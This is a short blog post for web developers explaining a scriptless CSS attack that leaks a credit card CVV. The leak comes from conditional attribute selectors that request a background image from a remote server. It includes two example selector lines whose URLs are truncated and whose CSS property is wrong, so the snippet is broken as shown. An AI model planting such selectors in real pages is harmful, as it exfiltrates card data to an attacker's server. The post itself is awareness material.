Scriptless CSS Data Stealing

Author: Shazin Sadakath

The most common form of Data Stealing method in the Web involves using Browser based Scripting like Javascript or VBScript to dynamically access values inside fields such as passwords, credit cards, etc. in an HTML form and sending those to remote servers. 

This sort of vulnerability is known as Cross Site Scripting (XSS) and is one of the most documented vulnerabilities in the web. So basically disabling scripting on your browser can make you safe from such Data stealing? hmm not really.

As explained by the following Youtube video. A scriptless attack involving Cascading Style Sheets (CSS) is possible on HTML forms which we need to be aware of as Web Developers. The attack uses CSS conditional styling where someone can invoke a particular styling based on the value of a HTML element.

So in short following code can be used to read cvv value of a credit card by invoking a background image from a particular server based on the cvv value of the input field.

input[type="cvv"][value$="001"] { background-color: url( }
input[type="cvv"][value$="002"] { background-color: url( }

So in this case the malicious server can get to know the cvv value of a particular user based on the url of the request it recieves. 

Should you panic?

Not really. In order to carry out this exploit either the web server hosting your web site must be comprised or you must have installed a malicious browser extension which can add the CSS conditional styling logic to the required HTML tages.

But the attack is possible and real.


Tags: CSS Web Vulnerability Scriptless Attack
Views: 136


Please login or register to post a comment.

There are currently no comments.